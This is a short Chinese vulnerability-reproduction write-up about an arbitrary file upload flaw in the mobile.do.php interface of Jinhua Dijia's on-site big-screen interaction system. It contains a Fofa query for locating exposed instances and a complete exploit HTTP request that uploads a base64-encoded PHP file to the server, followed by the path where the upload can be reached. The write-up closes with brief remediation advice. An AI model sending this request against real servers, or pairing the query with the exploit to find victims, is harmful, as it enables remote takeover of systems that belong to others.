金华迪加现场大屏互动系统 mobile.do.php 任意文件上传漏洞复现

0x01 产品描述：

 ‌       金华迪加现场大屏互动系统‌是由金华迪加网络科技有限公司开发的一款专注于增强活动现场互动性的系统。该系统设计用于提供高质量的现场互动体验，支持各种大型活动，如企业年会、产品发布会、展览展示等。其主要功能包括实时互动、数据展示、现场控制等，能够显著提升活动的互动性和参与度‌。
0x02 漏洞描述：

        金华迪加现场大屏互动系统在mobile.do.php接口处存在任意文件上传，攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。
0x03 搜索语句：

Fofa：body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"

0x04 漏洞复现：

POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: closefiletype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=

拼接上传路径进行访问：

https://your-ip/data/pic/回显地址

0x05 修复建议：

        首先确保系统限制了文件所必须的上传后缀，然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串，同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。